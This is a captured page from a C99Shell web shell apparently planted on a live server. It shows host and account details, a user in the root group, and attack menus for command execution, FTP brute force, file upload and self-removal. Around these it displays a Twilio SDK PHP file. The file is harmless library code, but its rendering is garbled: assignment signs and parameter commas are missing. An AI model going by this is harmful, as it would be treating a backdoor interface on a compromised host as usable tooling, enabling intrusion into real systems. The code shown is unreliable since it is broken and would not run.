!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/test.sms.picotech.app/public_html/vendor/twilio/sdk/src/Twilio/   drwxrwxr-x
Free 28.65 GB of 117.98 GB (24.29%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Values.php (2.51 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php


namespace Twilio;


class 
Values implements \ArrayAccess {
    public const 
NONE 'Twilio\\Values\\NONE';
    public const 
ARRAY_NONE = [self::NONE];

    protected 
$options;

    public static function 
array_get(array $arraystring $keystring $default null) {
        if (
\array_key_exists($key$array)) {
            return 
$array[$key];
        }
        return 
$default;
    }

    public static function 
of(array $array): array {
        
$result = [];
        foreach (
$array as $key => $value) {
            if (
$value !== self::NONE && $value !== self::ARRAY_NONE) {
                
$result[$key] = $value;
            }
        }
        return 
$result;
    }

    public function 
__construct(array $options) {
        
$this->options = [];
        foreach (
$options as $key => $value) {
            
$this->options[\strtolower($key)] = $value;
        }
    }

    
/**
     * (PHP 5 &gt;= 5.0.0)<br/>
     * Whether a offset exists
     * @link http://php.net/manual/en/arrayaccess.offsetexists.php
     * @param mixed $offset <p>
     * An offset to check for.
     * </p>
     * @return bool true on success or false on failure.
     * </p>
     * <p>
     * The return value will be casted to boolean if non-boolean was returned.
     */
    
public function offsetExists($offset): bool {
        return 
true;
    }

    
/**
     * (PHP 5 &gt;= 5.0.0)<br/>
     * Offset to retrieve
     * @link http://php.net/manual/en/arrayaccess.offsetget.php
     * @param mixed $offset <p>
     * The offset to retrieve.
     * </p>
     * @return mixed Can return all value types.
     */
    
#[\ReturnTypeWillChange]
    public function 
offsetGet($offset) {
        
$offset \strtolower($offset);
        return 
\array_key_exists($offset$this->options) ? $this->options[$offset] : self::NONE;
    }

    
/**
     * (PHP 5 &gt;= 5.0.0)<br/>
     * Offset to set
     * @link http://php.net/manual/en/arrayaccess.offsetset.php
     * @param mixed $offset <p>
     * The offset to assign the value to.
     * </p>
     * @param mixed $value <p>
     * The value to set.
     * </p>
     * @return void
     */
    
public function offsetSet($offset$value): void {
        
$this->options[\strtolower($offset)] = $value;
    }

    
/**
     * (PHP 5 &gt;= 5.0.0)<br/>
     * Offset to unset
     * @link http://php.net/manual/en/arrayaccess.offsetunset.php
     * @param mixed $offset <p>
     * The offset to unset.
     * </p>
     * @return void
     */
    
public function offsetUnset($offset): void {
        unset(
$this->options[$offset]);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--